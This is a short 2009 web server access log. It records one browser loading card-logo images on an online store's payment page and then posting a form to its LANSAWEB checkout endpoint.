220.247.11.218 - - [05/Aug/2009:05:28:13 -0400] "GET /images/bt_cal-a.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195D04346D586009C53071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:28:13 -0400] "GET /images/AMEX.GIF HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195D04346D586009C53071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:28:14 -0400] "GET /images/DISCOVER.GIF HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195D04346D586009C53071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:28:14 -0400] "GET /images/MCARD.GIF HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195D04346D586009C53071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:28:14 -0400] "GET /images/VISA.GIF HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195D04346D586009C53071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:28:15 -0400] "GET /images/space.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195D04346D586009C53071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:28:30 -0400] "GET /images/processcard.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195D04346D586009C53071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:28:31 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0195D04A4A4596009BE3071+M37+ENG HTTP/1.1" 200 40421 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195D04346D586009C53071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
